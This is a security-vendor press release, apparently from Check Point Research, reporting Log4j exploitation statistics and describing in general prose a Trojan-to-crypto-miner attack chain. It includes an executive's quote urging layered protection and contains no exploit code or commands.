CPR has detected numerous attacks exploiting the Log4j vulnerability, and shows a detailed example of how a real life attack actually works. While most detected miners leveraged this vulnerability for Linux-based crypto mining, Check Point researchers have now detected a cyber attack involving an undetected, first time, NET-based malware. This specific attack today targeted five victims in the finance, banking, and software industries in the following countries: Israel, United States, South Korea, Switzerland and Cyprus. The server that contains the malicious files is located in the US and hosts multiple malicious files.
Such attacks (crypto oriented, less destructive) represent the early stages of large scale attacks (such as ransomware). It is sort of a “live trial” of the vulnerability and the potential of the damage which can be made at the victims, to later perform a larger offensive.
In simple terms, once any type of malware is injected, it’s only a question of time for a larger attack. Technically there’s not much difference. What is now crypto mining, often later becomes ransomware and other types of significant attacks.
Currently, CPR has tracked over 1,272,000 attempts to exploit the vulnerability, affecting over 44% of corporate networks globally.
How the Attack Works:
The attack exploits the Log4j vulnerability to download a Trojan malware, which triggers a download of an .exe file, which in turn installs a crypto-miner. Once the crypto-miner is installed, it starts using the victim’s resources in order to mine for cryptocurrency for the attackers’ profit, all without the victim knowing they have been compromised. As part of the malware’s evasion techniques, all relevant functions and file names are obscured to avoid detection by static analysis mechanisms.
- So far, CPR has tracked over 1,272,000 attempts to exploit the vulnerability. 46% of those by known malicious hacking groups.
- Attempted exploits have been documented on over 44% of corporate networks globally
Lotem Finkelstein, Head of Threat Intelligence at Check Point Software:
“We have detected a massive number of exploitation attempts during the last few days. Attackers are actively scanning for potentially vulnerable targets, and new scanning tools for this vulnerability keep surfacing. Lower scale attacks are how larger scale attacks develop. Threat actors like to test their tools and targets, leading to more dangerous attacks such as ransomware.
This is clearly one of the most serious vulnerabilities on the internet in recent years, and it’s spreading like wildfire. At some points, we saw over 100 hacks a minute related to the LogJ4 vulnerability. We’re seeing what appears to be an evolutionary repression, with new variations of the original exploit being introduced rapidly — over 60 in less than 24 hours. The number of combinations of how to exploit it gives the attacker many alternatives to bypass newly introduced protections. It means that one layer of protection is not enough, and only multi layered security posture would provide a resilient protection.
Unlike other major cyber attacks that involve one or limited number of software, Log4j is basically embedded in every Java based product or web service. It is very difficult to manually remediate it . Once an exploration was published (on Friday), scans of the internet ensued (to allocate surfaces which are vulnerable due to this incident). Those who won’t implement a protection are probably already scanned by malicious actors. Already, we’ve documented over 1,272,000 attacks, where over 44% of corporate networks globally have been targeted.
This vulnerability, because of the complexity in patching it and easiness to exploit, will stay with us for years to come, unless companies and services take immediate action to prevent the attacks on their products by implementing a protection. Now is the time to act. Given the holidays seasons, when security teams may be slower to implement protective measure, the threat is imminent. This acts like a cyber pandemic — highly contagious, spreads rapidly and has multiple variants, which force more ways to attack.”